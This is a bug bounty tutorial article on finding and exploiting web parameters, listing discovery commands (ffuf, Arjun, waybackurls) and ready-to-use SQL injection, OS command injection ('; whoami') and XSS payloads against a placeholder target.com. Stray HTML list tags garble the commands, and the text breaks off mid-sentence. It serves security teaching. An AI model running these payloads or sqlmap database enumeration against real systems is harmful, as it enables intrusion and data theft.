Listen to this Post
Introduction:
In the dynamic world of bug bounty hunting, success often hinges on a hunter’s ability to meticulously manipulate every aspect of a web request. The core principle that “every bug has its parameters, every parameter has its bugs” underscores a fundamental truth: parameters are the primary attack surface in modern web applications. This article deconstructs the methodology behind identifying and exploiting parameter-based vulnerabilities, transforming standard testing into a profitable pursuit.
Learning Objectives:
- Master the systematic process for identifying and testing all parameter types within a target application.
- Learn advanced exploitation techniques for common parameter-based vulnerabilities like SQLi, XSS, and SSRF.
- Develop a professional workflow for vulnerability validation and report writing to ensure bounty approval.
You Should Know:
1. Enumerating the Attack Surface: Finding Every Parameter
The first step is discovering all possible inputs. This goes beyond visible form fields to include URL parameters, POST data, headers, and JSON/XML bodies.
Verified Commands & Techniques:
1. Using curl to inspect a basic GET request curl -s "https://target.com/page?search=term&user_id=45" | grep -oP 'name="\K[^"]' <ol> <li>Intercepting and modifying requests with Burp Suite Proxy Configure browser to use Burp (127.0.0.1:8080), capture request, right-click -> "Send to Repeater"</p></li> <li><p>Using ffuf for brute-forcing hidden parameters ffuf -w /usr/share/wordlists/parameter-names.txt -u "https://target.com/endpoint" -X POST -d "FUZZ=test" -H "Content-Type: application/x-www-form-urlencoded" -fr "error"</p></li> <li><p>Using Arjun for advanced parameter discovery python3 arjun.py -u https://target.com/endpoint --headers "Authorization: Bearer token"</p></li> <li><p>Automating initial reconnaissance with waybackurls and Gau echo "target.com" | waybackurls | grep "?" | qsreplace -a
Step-by-step guide: Start by manually browsing the application with your proxy active. For each request, note every parameter. Then, use tools like `ffuf` or `Arjun` with large wordlists to discover unlinked parameters. Finally, use `qsreplace` to quickly add a payload marker to every parameter found in historical data for batch testing.
- Testing for Server-Side Vulnerabilities: SQL Injection & Command Execution
Parameters that interact with databases or system shells are high-value targets for SQL Injection (SQLi) and OS Command Injection.
Verified Commands & Code Snippets:
1. Basic SQLi probing with single quote and logical operators curl -s -g "https://target.com/user?id=1'" | grep -i "error|sql|exception" curl -s -g "https://target.com/user?id=1 OR 1=1--" <ol> <li>Automated SQLi detection with SQLmap sqlmap -u "https://target.com/user?id=1" --batch --level=3 --risk=2 --dbs</p></li> <li><p>Time-based blind SQLi payload for MySQL curl -s -g "https://target.com/user?id=1' AND SLEEP(5)-- -"</p></li> <li><p>Testing for OS command injection in email/ping parameters curl -s -X POST "https://target.com/status" -d "ip=127.0.0.1; whoami" curl -s -X POST "https://target.com/status" -d "ip=127.0.0.1 || id"</p></li> <li><p>Union-based SQLi to extract data (adjust column count) curl -g "https://target.com/page?id=1' UNION SELECT 1,2,3,version(),5-- -"
Step-by-step guide: After identifying a parameter, first test for syntax errors with `’` or ". If errors are reflected, proceed with logical tests like OR 1=1. For time-based blind SQLi, use the `SLEEP()` command and monitor response times. Always escalate promising leads with `sqlmap` for full database enumeration. For command injection, use operators like ;, |, `&&` to chain commands.
3. Exploiting Client-Side Flaws: Cross-Site Scripting (XSS)
XSS remains a top vulnerability where malicious scripts are injected through parameters and executed in a user’s browser.
Verified Commands & Code Snippets:
1. Basic XSS probe to test for reflection curl -s -g "https://target.com/search?q=<script>alert(1)</script>" | grep -i "script" <ol> <li>Using a reflected XSS polyglot payload curl -s -g "https://target.com/search?q=jaVasCript:/-/'/'/'/'//(/ /oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"</p></li> <li><p>DOM-based XSS testing by breaking out of JavaScript context curl -s "https://target.com/page"><img src=x onerror=alert(1)>"</p></li> <li><p>Testing for stored XSS in comment/contact forms curl -s -X POST "https://target.com/comment" -d "name=test&comment=<svg onload=alert(document.domain)>"</p></li> <li><p>Bypassing basic filters with encoding curl -s -g "https://target.com/search?q=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"
Step-by-step guide: Identify parameters that are reflected in the HTTP response without proper encoding. Start with simple `